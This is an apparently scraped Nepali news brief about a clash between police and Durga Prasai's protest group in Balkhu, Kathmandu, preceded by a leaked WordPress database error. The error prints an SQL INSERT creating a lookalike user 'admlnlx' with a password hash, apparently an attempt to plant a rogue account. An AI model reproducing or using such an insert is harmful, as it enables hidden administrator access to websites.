WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIsiGDvzz84viYZzs/q5m5MIdqq3jW0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 22:26:36', '', 'admlnlx', 'admlnlx')
काठमाडौं । काठमाडौंको बल्खुमा प्रदर्शन गर्ने दुर्गा प्रसाईं समूह र प्रहरीबीच झडप भएको छ ।
प्रदर्शनकारी प्रहरीको घेरा तोडेर कालीमाटीतर्फ जान खोजेपछि प्रहरीले हस्तक्षेप गरेको थियो । सो क्रममा प्रहरीले पानीको फोहरा, आधादर्जन बढि अश्रूग्यास प्रहार गरेको थियो भने प्रदर्शनकारीले ढुङ्गा प्रहार गरेका थियो । झडपका क्रममा केहि प्रहरी र प्रदर्शनकारी घाइते भएका छन् । दुर्गा प्रसाईं समूह भने आफुहरुको शान्तिपूर्ण आन्दोलनमा घुसपैठ भएको आरोप लगाएका छन् ।